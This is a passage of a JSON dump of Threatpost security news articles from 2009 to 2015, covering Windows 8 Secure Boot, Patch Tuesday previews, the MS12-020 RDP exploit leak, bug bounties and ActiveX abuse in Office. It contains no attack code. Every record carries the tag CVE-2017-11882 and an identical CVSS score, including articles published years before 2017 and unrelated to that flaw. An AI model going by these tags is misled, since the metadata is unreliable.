To address the security threats of today and tomorrow, we as an industry need to appreciate both,\u201d Moussouris said.\n", "cvss3": {}, "published": "2012-07-27T13:57:41", "type": "threatpost", "title": "Vasillis Pappas Wins $200,000 Microsoft Blue Hat Prize", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:47", "id": "THREATPOST:44C93D75841336281571380C5E523A23", "href": "https://threatpost.com/vasillis-pappas-wins-200000-microsoft-blue-hat-prize-072712/76857/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:47", "description": "Microsoft officials are seeking to assuage concerns that its implementation of UEFI in Windows 8 will prevent users from loading non-Microsoft operating systems or applications on their machines. Despite concerns raised by security researchers and open-source advocates about vendor lock-in and other issues arising from the use of a secure boot sequence in the upcoming OS, Microsoft says \u201cthe customer is in control of their PC.\u201d\n\nIn the days since Microsoft began talking about the details of Windows 8 and the security measures that it has added to the new version of the OS, security researchers and others have raised questions about the consequences of the implementation of the secure boot sequence that includes UEFI instead of a traditional BIOS underneath the firmware. The boot sequence for Windows 8, which is due in 2012, will be markedly different from that of its predecessors. The most notable difference is that the firmware will only load code that is signed and authenticated by a key that\u2019s embedded in the PC hardware. 
Any module that isn\u2019t signed won\u2019t be loaded.\n\nThe goal of this is to prevent malware such as rootkits and bootkits from staying resident on machines and reloading each time the machine is restarted. Such malware variants have become more popular in recent years as attackers have looked for new methods of keeping their attack tools on infected machines for a long period of time. That kind of malware can be difficult to detect and remove, and so Microsoft is hoping that the secure boot sequence using UEFI will help prevent it and other malicious software from making its way onto the PC in the first place.\n\n\u201cIn most PCs today, the pre-operating system environment is vulnerable to attacks by redirecting the boot loader handoff to possible malicious loaders. These loaders would remain undetected to operating system security measures and antimalware software,\u201d Microsoft\u2019s [Tony Mangefeste](<https://blogs.msdn.com/b/b8/archive/2011/09/22/protecting-the-pre-os-environment-with-uefi.aspx>) wrote in a post explaining the architectural change.\n\nHowever, critics have raised concerns that the system also gives Microsoft the ability to prevent users from running third-party operating systems such as Linux on their PCs. Ross Anderson, a security researcher at the University of Cambridge, said in a blog post yesterday that the move by Microsoft could have serious consequences.\n\n\u201cThe extension of Microsoft\u2019s OS monopoly to hardware would be a disaster, with increased lock-in, decreased consumer choice and lack of space to innovate. It is clearly [unlawful](<http://en.wikipedia.org/wiki/Article_82>) and must not succeed,\u201d Anderson wrote.\n\nMangefeste said that the secure boot sequence is designed to prevent malware from loading and not to stop users from loading other software they want to run, including alternate operating systems.\n\n\u201cAt the end of the day, the customer is in control of their PC. 
Microsoft\u2019s philosophy is to provide customers with the best experience first, and allow them to make decisions themselves. We work with our OEM ecosystem to provide customers with this flexibility. The security that UEFI has to offer with secure boot means that most customers will have their systems protected against boot loader attacks. For the enthusiast who wants to run older operating systems, the option is there to allow you to make that decision,\u201d Mangefeste wrote.\n\n\u201cA demonstration of this control is found in the Samsung tablet with Windows 8 Developer Preview that was offered to //BUILD/ participants. In the screenshot below you will notice that we designed the firmware to allow the customer to disable secure boot. However, doing so comes at your own risk.\u201d\n", "cvss3": {}, "published": "2011-09-23T15:14:43", "type": "threatpost", "title": "Microsoft Defends Secure Boot in Windows 8", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:43", "id": "THREATPOST:7D2F975F60C58181C3B6726E809F10FD", "href": "https://threatpost.com/microsoft-defends-secure-boot-windows-8-092311/75683/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:33", "description": "Microsoft announced Thursday that it plans to release four bulletins next week as part of the year\u2019s first batch of [Patch Tuesday security updates](<http://blogs.technet.com/b/msrc/archive/2014/01/09/advance-notification-service-for-the-january-2014-security-bulletin-release.aspx>), none of which are rated critical.\n\nDespite the relatively light load, the patches do address a [zero-day vulnerability in Windows XP and Windows Server 2003](<http://threatpost.com/latest-xp-zero-day-renews-calls-to-move-off-the-os/103058>) made public in early November. 
Hackers were actively exploiting the [flaw in the ND Proxy driver that manages Microsoft\u2019s Telephony API](<http://threatpost.com/microsoft-to-patch-tiff-zero-day-wait-til-next-year-for-xp-zero-day-fix/103117>) on XP via infected PDF attachments. Exploits work only in conjunction with an Adobe Reader vulnerability that has since been patched.\n\nIn addition to Microsoft patches, expect a fresh batch of Adobe patches as well as Oracle\u2019s quarterly Critical Patch Update, which is generally a massive patch rollout that now includes Java patches.\n\nThe Microsoft bulletins will address vulnerabilities in Windows, Office and Dynamics AX, all which Microsoft has deemed important, including the zero-day fixes.\n\n\u201cIt\u2019s only rated important for a variety of reasons, including the fact that Microsoft will end support for XP in April,\u201d said Russ Ernst, a director of product management at Lumension. \u201cIf you\u2019re still using XP, this will be an important patch to deploy. And, hopefully you are working on your migration plan.\u201d\n\nAccording to a post on Microsoft\u2019s Security Response Center blog by Dustin Childs, MS14-002, will address the zero day, and he acknowledged they were working on a patch for the issue \u2013 which stems from a vulnerability in the kernel and allows local privilege escalation and access to the kernel \u2013 back in December.\n\n\u201cWe have only seen this issue used in conjunction with a PDF exploit in targeted attacks, and not on its own,\u201d Childs said.\n\nMicrosoft has used the zero-day vulnerability as a prime opportunity to urge [Windows users to migrate off XP](<http://threatpost.com/microsoft-xp-end-of-life-an-important-security-milestone/102789>). 
The company previously announced its plans to effectively end support for the operating system on April 8.\n\nThe first bulletin will address a remote code execution vulnerability in Microsoft\u2019s SharePoint Server and Microsoft Word, the third will fix an elevation of privilege vulnerability in Windows 7 and Server 2008 R2, and the last bulletin will fix a denial of service (DoS) issue in Microsoft\u2019s enterprise resource planning software, Dynamics AX.\n\nAs usual, Microsoft will push updates for the software in question next Tuesday and post patch analysis and deployment guidance on its Security Response Center blog.\n", "cvss3": {}, "published": "2014-01-09T13:02:31", "type": "threatpost", "title": "Microsoft to Patch Zero Day in January 2014 Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-01-14T19:04:09", "id": "THREATPOST:98BE42759F35CD829E6BD3FAC7D5D1D5", "href": "https://threatpost.com/microsoft-expected-to-patch-xp-zero-day-on-patch-tuesday/103591/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:09", "description": "Microsoft has acknowledged a new unpatched vulnerability in Internet Explorer 6 and 7, and said that the company is investigating methods for fixing the flaw.\n\nThe company said that although there is public exploit code available for the vulnerability, it has not seen any evidence of ongoing attacks against the IE flaw yet. Experts said that the exploit code for the vulnerability, which was published on Friday on Bugtraq, was unreliable. However, researchers at IBM ISS\u2019s X-Force said on Monday that they had developed a reliable exploit of their own for the flaw.\n\nIn its advisory on the IE flaw, Microsoft said that the weakness affects IE6 and IE7 running on Windows XP, Windows Server 2003, Windows Vista and Windows Server 2008. 
The vulnerability does not affect Windows 7, the company\u2019s newest release, or IE8, the latest version of the browser. Microsoft also said that running IE7 in Protected Mode, which limits some of its functionality, on Windows Vista, mitigates some of the effects of the vulnerability.\n\n\u201cAt this time, we are aware of no attacks attempting to use this vulnerability against Internet Explorer 6 Service Pack 1 and Internet Explorer 7. We will continue to monitor the threat environment and update this advisory if this situation changes. On completion of this investigation, Microsoft will take the appropriate action to protect our customers, which may include providing a solution through our monthly security update release process, or an out-of-cycle security update, depending on customer needs,\u201d Microsoft said in its advisory.\n\nThe next monthly patch release from Microsoft is due Dec. 8. Until a patch is available, Microsoft suggests several actions that could help mitigate the vulnerability, including setting IE to prompt you before it runs ActiveX controls or active scripting; and enabling DEP (Data Execution Prevention) in IE7. To enable DEP, go to the Tools menu, click on Internet Options and then on the Advanced tab. Select the check box for \u201cEnable memory protection to help mitigate online attacks.\u201d\n\nMicrosoft also has published a FixIt tool that will automatically enable DEP.\n", "cvss3": {}, "published": "2009-11-24T14:39:50", "type": "threatpost", "title": "Microsoft Acknowledges IE7 Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:04:18", "id": "THREATPOST:0FEEF48E09B4F6AB583220AF2A1CCE70", "href": "https://threatpost.com/microsoft-reconoce-falla-en-ie-7-112409/73159/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:30", "description": "Microsoft has a big, ugly problem on its hands. The company is caught in the middle of what\u2019s rapidly become a major controversy centered on the leak of proof-of-concept [exploit code for the MS12-020 RDP vulnerability](<https://threatpost.com/ms12-020-rdp-exploit-found-researchers-say-code-may-have-leaked-security-vendor-031612/>). Many researchers, including the one who first discovered the bug and reported it to Microsoft through the Zero Day Initiative, believe that the software giant has a leak, either within its own walls in Redmond, or somewhere in its MAPP information-sharing program.\n\nThere are a number of possible explanations for the appearance of the exploit code on a Chinese download site. As odd as it may sound, the absolute best-case scenario for Microsoft is that the code was inadvertently leaked by one of the members of the MAPP (Microsoft Active Protections Program) community. If that\u2019s the case, then it simply means that one (or possibly more) of the MAPP partners was careless with the information Microsoft shared with them and the code somehow got into the wrong hands. 
That\u2019s not good, but it\u2019s not fatal.\n\nThe second possibility is that someone working at one of the [MAPP companies](<http://www.microsoft.com/security/msrc/collaboration/mapp.aspx>) deliberately posted the code. The MAPP program includes several dozen security and antimalware companies from around the world, and although those companies have signed NDAs and should restrict access to the MAPP info to a small group of people within their organizations, it\u2019s possible that there\u2019s a rogue employee somewhere along the line who could have done this. \n\nMoving up the scale of relative badness, a third scenario would be that someone at ZDI leaked the exploit code, either deliberately or accidentally. ZDI has been buying bugs from researchers and forwarding the data on to affected vendors for several years now, and there hasn\u2019t been any acknowledged incident linked to exploit code from the company or one of its affiliated researchers finding its way into the public domain. Once the company confirms that a bug is exploitable and has signatures ready for its customers, it then sends the data in encrypted form to the affected vendors and is pretty much out of the process from there on out. And, there\u2019s evidence that the code posted on the Chinese site was written well after ZDI sent the vulnerability information to Microsoft.\n\nAaron Portnoy of ZDI said that he is \u201c100% confident\u201d that the leak did not come from ZDI and that Microsoft has confirmed this, as well.\n\n\u201cIt was most definitely not ZDI that leaked anything,\u201d he said. \u201cWe PGP encrypt all the details and send it to the vendor and it\u2019s out of our hands at that point. We\u2019ve never had any reason to think that there\u2019s any leaks in our organization.\u201d\n\nA fourth potential scenario is that someone at the Microsoft Security Response Center somehow leaked the code. This is a fairly terrifying possibility. 
Consider the access that MSRC employees have. They see the incoming bug reports from researchers, work with researchers to confirm the vulnerabilities and help develop proof-of-concept exploits. If someone inside that process purposely handed over information about the RDP bug, it would be a disaster. The RDP vulnerability is a valuable one because of the huge number of affected machines and the fact that it can be exploited over the network, pre-authentication. Giving exploit code for that kind of flaw\u2013or any flaw, for that matter\u2013to outside parties would be about as bad as it gets.\n\nWhich leads to the last possibility: the MSRC is compromised. This is the doomsday scenario for Microsoft and its customers. The MSRC is a repository of a tremendous amount of valuable vulnerability data, and if that organization was somehow owned, the repercussions would be mind-boggling. It seems likely that if this was the case, there would have been other indications of the compromise at some point, possibly in the form of other exploits being leaked. And it also stands to reason that if someone had compromised the MSRC, he wouldn\u2019t advertise that fact by posting identifiable exploit code on a public site.\n\n[Luigi Auriemma](<http://aluigi.org/adv/ms12-020_leak.txt>), who discovered the RDP flaw, says that he believes that the leak came from somewhere in the MAPP chain of custody, given that the exploit code in question looks to have been written at the MSRC and that it contains a packet that he is certain is one he wrote explicitly for the purpose of testing the bug.\n\n\u201cThe executable PoC was compiled in November 2011 and contains some debugging strings like MSRC11678 which is a clear reference to the Microsoft Security Response Center. 
In short it seems written by Microsoft for the internal tests and was leaked probably during its distribution to their \u2018partners\u2019 (MAPP) for the creation of antivirus signatures and so on,\u201d he wrote in an analysis of the situation on his site. \u201cThe other possible scenario is about a Microsoft employee as direct or indirect source of the leak. The hacker intrusion looks the less probable scenario at the moment. The information retrieved by other people in the moment I\u2019m writing seem to confirm the MAPP hypothesis.\u201d\n\nMicrosoft [published a blog post](<http://blogs.technet.com/b/msrc/archive/2012/03/16/proof-of-concept-code-available-for-ms12-020.aspx>) late Friday afternoon on the code leak, but hasn\u2019t made security officials available to answer specific questions.\n\n\u201cThe details of the proof-of-concept code appear to match the vulnerability information shared with Microsoft Active Protections Program (MAPP) partners. Microsoft is actively investigating the disclosure of these details and will take the necessary actions to protect customers and ensure that confidential information we share is protected pursuant to our contracts and program requirements,\u201d Yunsun Wee, director in the Trustworthy Computing Group, wrote. 
\n\n_Note: Kaspersky Lab is a member of the MAPP program, but Threatpost editors do not have access to the MAPP information._\n", "cvss3": {}, "published": "2012-03-16T19:12:33", "type": "threatpost", "title": "MS12-020 RDP Code Leak Mystery Deepens As Microsoft Remains Silent", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:36", "id": "THREATPOST:7FF462EBFF86BEB1E7C8207D6CB07E50", "href": "https://threatpost.com/ms12-020-rdp-code-leak-mystery-deepens-microsoft-remains-silent-031612/76339/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:36", "description": "Many industries tend to run in identifiable cycles. Financial services, the auto industry, entertainment\u2013they all have cycles. Because the security industry isn\u2019t nearly as old as any of these, it hasn\u2019t had much of a chance to establish such cycles. But one seems to be appearing now in the form of renewed criticism and distaste for offensive security research.\n\nThe most recent cycle has been building momentum for some time now, but the jumping off point may have come last month in a talk by Adobe security and privacy chief Brad Arkin. The gist of the talk was that defenders need to focus their energy on making exploitation and attacks more expensive for the bad guys. However that happens\u2013whether it\u2019s through the addition of exploit mitigation technologies, deploying sandboxes or any number of other techniques\u2013raising the cost of attacks should be the priority.\n\n\u201cI would say to the researchers here, work on defense. This is where you\u2019re going to make a difference,\u201d Arkin said. 
\u201cIf you come up with a new offensive technology, the bad guys will use it.\u201d\n\nThat\u2019s in contrast to the mentality that has prevailed among many software companies and security professionals, who often focus on finding and fixing as many security vulnerabilities as possible. The more bugs you fix, the fewer there are for the attackers to exploit, after all.\n\nThat\u2019s true, of course, but it ignores the fact that the number of total bugs is unknowable and constantly changing. And, it also ignores the fact that many attackers don\u2019t ever bother with zero days; there\u2019s no need. There are so many older vulnerabilities that are lying unpatched on millions and millions of machines out there that it\u2019s a waste of time and money for attackers to look for new ones to exploit.\n\n\u201cFinancially motivated attackers don\u2019t invest in original research. It\u2019s too expensive these days,\u201d Arkin said. \u201cIt\u2019s pen testers or it\u2019s nation states or the people funded by them. That research is done by professional bad guys who have financial horizons that far exceed those of financially motivated bad guys.\u201d\n\nAt last week\u2019s RSA Conference there were more murmurs about the relative value of offensive security research, too. The ongoing debate about the sale of bugs\u2013whether it\u2019s on the black market, the grey area of government sales or to legitimate entities such as the Zero Day Initiative\u2013includes some in the security community who are of the mind that selling vulnerabilities is an inherently shady activity. That discussion came up many times over the course of the week, with a predictable lack of agreement on the subject.\n\nThe problem, opponents of bug sales say, is that regardless of who you sell the bug to, you have no way of knowing against whom that vulnerability might ultimately be used. 
Some researchers say that\u2019s not their problem; they do the research and make the sale and what happens after that is up to the buyer and out of their hands.\n\nWith the [Pwn2Own contest at CanSecWest](<https://threatpost.com/revamped-pwn2own-offer-105k-prizes-cash-google-chrome-0-days-012312/>) scheduled for later this week, the conversation will likely not just continue, but amp up. Offense is at the fore at CanSecWest, not just during Pwn2Own, but during the conference talks, as well, and rare is the year that a major bug or exploitation technique isn\u2019t revealed there.\n\nThis is not the first time this carousel has spun round this way. Ten or fifteen years ago, as legitimate security research was making its way into the mainstream, many vendors had reactions bordering on anaphylactic shock when a researcher reported a bug to them or went public with it after a lack of response. Large software companies, including Microsoft and Oracle, would in some cases refuse to deal with researchers at all or slow the process down to such a point that it was impossible for the researchers to know whether the bug would ever be fixed.\n\nThat led to the brain-melting disclosure debate, which has never gone away, and it also led to the establishment of formal security response programs and organizations at many companies. Later, it helped spur the bug bounty programs run by companies such as Google, Mozilla and others, to reward security researchers who chose to report their findings to the vendors privately.\n\nSo, as often happens, what was old is now new again. But this time it has the added spice of cyberwar hysteria, with legions of highly trained foreign attackers using zero days stolen from some secret NSA database. Maybe that\u2019s happening. Who knows? But what\u2019s definitely happening is that researchers are selling bugs to a variety of people and organizations, some legitimate and others not. 
And as long as serious bugs can command six figures, that\u2019s never going to end and neither will offensive security research.\n", "cvss3": {}, "published": "2012-03-06T10:20:31", "type": "threatpost", "title": "An End to Offensive Security Research? Unlikely", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:42", "id": "THREATPOST:0F2DE86E0069A54E56B0694DA999399A", "href": "https://threatpost.com/end-offensive-security-research-unlikely-030612/76285/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:45", "description": "Microsoft made patch news on two fronts last month with an unusual [emergency patch for a critical vulnerability in Kerberos](<http://threatpost.com/microsoft-to-release-critical-out-of-band-windows-patch/109433>), and for a missing fix for an Exchange bug that was promised in its November advance notification.\n\nIn the [December advance notification](<https://technet.microsoft.com/library/security/ms14-dec>), released today, an elevation of privilege bug in Exchange is listed among seven scheduled bulletins to be pushed out next Tuesday. The Exchange patch is rated important, one of four bulletins so rated by Microsoft; the remaining three are rated critical, meaning the likelihood of remote code execution and imminent exploit is high.\n\nExpect the Exchange patch to be MS14-075. The patch applies to Microsoft Exchange Server 2007 SP3, Exchange Server 2010 SP3, Exchange Server 2013 SP1 and Exchange Server 2013 Cumulative Update 6. No further details were made available by Microsoft.\n\nThe three critical bulletins expected next week are topped off by another Internet Explorer rollup. The IE vulnerabilities addressed are rated moderate for IE 6, IE 7 and IE 8 running on Windows Server 2003 and Windows Server 2008. 
They are rated critical for remote code execution on Vista, Windows 7, Windows 8 and 8.1 for IE 7 and up.\n\nAnother critical remote code execution bulletin is expected in Office software starting with Microsoft Word 2007 SP 3, as well as Microsoft Office 2010 SP 2, Word 2010 SP 2, Word 2013 and Word 2013 RT. Microsoft Office for Mac 2011 is also vulnerable, as is Microsoft Word Viewer and Microsoft Office Compatibility Pack. Microsoft SharePoint Server 2010, 2013, and Microsoft Office Web Apps 2010 and 2013 are also covered by this bulletin, but those vulnerabilities are rated important.\n\nTwo other bulletins patch remote code execution vulnerabilities in Office, but are rated important, meaning there is some mitigating circumstance; for example, an attacker would need local access or legitimate credentials to exploit the flaw.\n\n\u201cWith the balance of next week\u2019s bulletins impacting Windows, December will be a month for IT to focus on the desktop,\u201d said Russ Ernst of Lumension.\n\nThe final critical bulletin covers remote code execution vulnerabilities in Windows Vista. The flaw is rated important for all other Windows Server versions. Windows Server 2003 users, meanwhile, are on notice that support runs out for the platform July 14, 2015.\n\nAs the year winds down, the number of critical bulletins is down. Microsoft is on track for 29 critical bulletins this year, compared to 42 last year, and 35 the year before. 
IT shops will have 83 bulletins to contend with this year, down from 105 in 2013, Lumension said.\n", "cvss3": {}, "published": "2014-12-04T14:04:03", "type": "threatpost", "title": "December 2014 Microsoft Patch Tuesday Advance Notification", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-12-09T21:46:18", "id": "THREATPOST:FFB8302BEBD76DDACC5FD08D3FF8F883", "href": "https://threatpost.com/missing-exchange-patch-expected-among-december-patch-tuesday-bulletins/109722/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:21", "description": "CANCUN \u2013 Bounty programs are mislabeled creatures, too often pigeonholed as a payoff for finding individual vulnerabilities in software.\n\nWrong.\n\n\u201cThe name bug bounty is actually a false categorization of what is truly just an incentive program,\u201d said Katie Moussouris, chief policy officer at HackerOne and architect of Microsoft\u2019s vulnerability coordination program, during her talk today at the Security Analyst Summit. \u201cYou are creating an incentive for whatever you want. It\u2019s not just individual bugs all the time.\u201d\n\nThat means organizations interested in nurturing their own programs should think about not only finding and fixing one-off bugs, but also focus on strategic goals such as eliminating entire classes of vulnerabilities and encouraging contributors to build mitigations. Architected correctly, vulnerability incentive programs can also feed an enterprise software development lifecycle and reduce the number of bugs that leak into production.\n\nAnd don\u2019t live under the illusion that you\u2019ll never have to contract a pen-tester again.\n\n\u201cThere\u2019s a time and place to get specialists under contract to look at things you don\u2019t want to open to the world; that\u2019s where a pen test comes in,\u201d Moussouris said. 
\u201cYou cannot replace pen-tests whole-heartedly. It\u2019s playing whack-a-bug if you\u2019re not feeding your bug bounty program results into your SDL.\u201d\n\nFor its part, Microsoft was standoffish about dipping into the bug bounty waters. And for good reason. As Moussouris explains it, for so long, researchers who wanted to find Windows or Internet Explorer bugs were only after credit in a Patch Tuesday security bulletin. Often, those were career boosters, she said. Even established third-party programs such as the Zero Day Initiative were contributing bugs to Microsoft gratis.\n\nBut as vulnerability brokers and companies such as VUPEN and ReVuln emerged, the market began to exert its pressures on Microsoft. Moussouris had to turn part politician inside the walls of Redmond and convince the powers that be to provide incentives to researchers to not give in to the six-figure seduction of the vulnerability market and renew relationships with white-hats.\n\nThe end result was a number of specialized bounties sponsored by Microsoft, including a $100,000 mitigation bypass bounty, the Blue Hat bonus for defense and a temporary Internet Explorer bounty.\n\nIn each case, there were carrots Microsoft was dangling in front of researchers that others in the market were not.\n\n\u201cAgain, this isn\u2019t a bounty, it\u2019s an incentive,\u201d Moussouris said.\n\nYet it still wasn\u2019t good enough, Moussouris said, remembering how she had to convince Microsoft to begin paying for bug submissions in IE 10 while that version of the browser was in beta. She treasures a chart that shows a huge spike in bug submissions once IE 10 was released to manufacturing, many of those critical vulnerabilities that would be fixed in security bulletins.\n\n\u201cThere were no incentives if Microsoft fixed a bug during beta; no bulletin, no credit, no incentives during that period,\u201d Moussouris said. 
\u201cWhat if we create an incentive beta program if there were no buyers in town?\u201d\n\nThe bounty program was extended into beta, giving Microsoft first crack at bugs before they were out in the open market. And they were fixed on the cheap too. For IE 10 in beta, there were 23 submissions, 18 of which would have been rated critical, including four sandbox escapes, Moussouris said. The payout: $28,000, an average payout of $1,100.\n\n\u201cIf you create an incentive at the right time, you will absolutely get the results you want,\u201d Moussouris said.\n", "cvss3": {}, "published": "2015-02-16T13:59:58", "type": "threatpost", "title": "Lessons Learned in Building a Vulnerability Coordination Program", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-16T20:06:46", "id": "THREATPOST:FCB99D1A395F7D2D1BFD9F698321FA04", "href": "https://threatpost.com/dont-build-a-bounty-program-build-an-incentive-program/111103/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:13", "description": "Microsoft today announced a relatively light load of patches will be delivered on [Patch Tuesday](<https://technet.microsoft.com/library/security/ms14-sep>) next week, along with some numbers that demonstrate public vulnerability disclosures continue to rise.\n\nFour security bulletins, one rated critical, are scheduled to be released next Tuesday. In what\u2019s becoming customary for Patch Tuesday, administrators can expect another cumulative patch roll-up for Internet Explorer addressing a number of remote code execution vulnerabilities in the browser.\n\nThe three remaining bulletins, all rated important by Microsoft, include a privilege-escalation bug in Windows 8 and 8.1 as well as Windows Server 2012 and RT. 
Another bulletin patches a .NET denial-of-service vulnerability in Windows Server 2003, 2008 and 2012, and on the client side OS back to Vista.\n\nAnother denial-of-service bug is expected to be patched in Microsoft\u2019s Lync instant messaging and collaboration software.\n\n\u201cThe few number of patches expected out next week doesn\u2019t mean you can take a pass on patching this month however,\u201d cautions Russ Ernst, director, product management, Lumension.\n\nLast month, Microsoft patched IE with a [cumulative update that addressed 26 vulnerabilities](<http://threatpost.com/microsoft-keeps-focus-on-ie-security-with-patch-tuesday-updates/107729>) including one exploited in the wild. The news out of last month\u2019s batch of bulletins, however, was a faulty patch, MS14-045, that was [re-released after users complained of crashes and blue screens of death](<http://threatpost.com/microsoft-fixes-broken-security-patch-ms14-045/107953>). The bulletin addressed vulnerabilities in kernel-mode drivers, and Microsoft blamed font issues for the system crashes.\n\nIn the meantime, Microsoft points out in a separate announcement that public vulnerability disclosures are approaching levels matching the first half of 2012, and that more than 4,000 disclosures have been made annually since the start of 2011. That number is still well shy of the 7,000 disclosed in the 2006-2007 timeframe, Microsoft said.\n\nFor the last half of 2013, for example, disclosures across the industry were up 6.5 percent from the start of the year, and up 12.6 percent from the second half of 2012. The severity of disclosures, however, is down. 
A little more than six percent of bugs scored 9.9 or greater on the CVSS standard in the second half of 2013, down from almost 13 percent in the first six months of the year.\n\n\u201cVulnerability complexity is an important factor to consider in determining the magnitude of the threat that a vulnerability poses,\u201d wrote Microsoft\u2019s Tim Rains in the [report](<http://blogs.technet.com/b/security/archive/2014/09/03/industry-vulnerability-disclosures-trending-up.aspx>). \u201cA high-severity vulnerability that can only be exploited under very specific and rare circumstances might require less immediate attention than a lower-severity vulnerability that can be exploited more easily.\u201d\n\nDisclosures of medium- and low-complexity bugs, posing the highest risk to users, far outnumber disclosures of high complexity vulnerabilities, Microsoft said.\n\nThird-party applications such as media players or Web components such as Flash or Java continue to dominate, with disclosures up 34.4 percent in the latter half of 2013 and accounting for 58 percent of disclosures during that timeframe. Operating system vulnerability disclosures, meanwhile, were down 46 percent and accounted for 15 percent of total disclosures. Browser bugs were also down, 28 percent, and made up 10 percent of overall disclosures.\n\nMicrosoft also examined disclosures for its products, 174 in the second half of 2013, up 2 percent from the first six months. 
Microsoft disclosures account for 7 percent of industry disclosures, down slightly from the start of the year.\n", "cvss3": {}, "published": "2014-09-04T15:07:28", "type": "threatpost", "title": "September 2014 Microsoft Patch Tuesday advance notification", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-04T19:07:28", "id": "THREATPOST:29E9543F6EC7903A34D286C6F4391368", "href": "https://threatpost.com/patch-tuesday-includes-another-ie-update-vuln-disclosures-up/108098/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:32", "description": "On the Microsoft Secure Windows Initiative blog, software engineer Chengyun discusses the default behaviour of ActiveX controls embedded in Office documents. The software giant also provides information on how an attacker can abuse ActiveX and how Office users can change the behavior of ActiveX controls embedded in Office documents.\n\nFrom [the article](<http://blogs.technet.com/srd/archive/2009/03/03/behavior-of-activex-controls-embedded-in-office-documents.aspx>):\n\nAttackers have discovered ActiveX support in Office applications and have been using it to more effectively lure victims to web-based malware. They have recently used the \u201cMicrosoft Scriptlet Component\u201d to navigate victims to a website exploiting a patched Internet Explorer vulnerability (CVE-2009-0075, fixed by [security bulletin MS09-002](<http://www.microsoft.com/technet/security/bulletin/ms09-002.mspx>)). 
Seems like attackers have discovered it is easier to trick a user into opening a Word document attached to email than to lure a user into clicking a dubious-looking link.\n\nChengyun also provides step-by-step instructions on configuring Office 2007 for users concerned about Safe-for-Initialization ActiveX controls being instantiated by Office without prompt.\n\nFor more on this type of attack, [check this entry](<http://blog.trendmicro.com/another-exploit-targets-ie7-bug/>) at Trend Micro\u2019s malware blog.\n", "cvss3": {}, "published": "2009-03-04T14:51:09", "type": "threatpost", "title": "Microsoft explains how ActiveX in Office is abused by attackers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:38", "id": "THREATPOST:6968030EBEDCF665121F267E466D3BA5", "href": "https://threatpost.com/microsoft-explains-how-activex-office-abused-attackers-030409/72366/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:48", "description": "Database Management Systems (DBMS) have extended their capabilities far beyond simply serving as data storage and query systems. Contrary to what they were in the 1970\n", "cvss3": {}, "published": "2010-10-18T19:49:08", "type": "threatpost", "title": "How to Minimize Your Database Attack Surface", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:19:32", "id": "THREATPOST:334259E5C4B157E6AC8ADC754BD30D4F", "href": "https://threatpost.com/how-to-minimize-your-database-attack-surface/74583/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:58", "description": "There\u2019s an odd bit of behavior that some Windows systems will exhibit when certain kinds of installers are launched, automatically elevating the privileges of the installer process to system-level privileges. 
